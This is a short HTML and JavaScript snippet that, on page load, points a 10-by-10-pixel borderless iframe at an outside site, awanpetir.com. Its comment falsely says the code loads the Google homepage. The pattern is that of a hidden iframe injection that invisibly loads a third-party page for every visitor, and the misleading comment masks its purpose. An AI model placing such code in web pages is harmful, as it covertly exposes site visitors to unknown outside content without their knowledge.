loadDeferredIframe
<script>
function loadDeferredIframe() {
// this function will load the Google homepage into the iframe
var iframe = document.getElementById("awanpetir");
iframe.src = "http://www.awanpetir.com/"
};
window.onload = loadDeferredIframe;
</script>
<!-- the following iframe will be rendered with no content -->
<iframe id="awanpetir" src="about:blank" width="10px" height="10px" scrolling="no" frameBorder="no">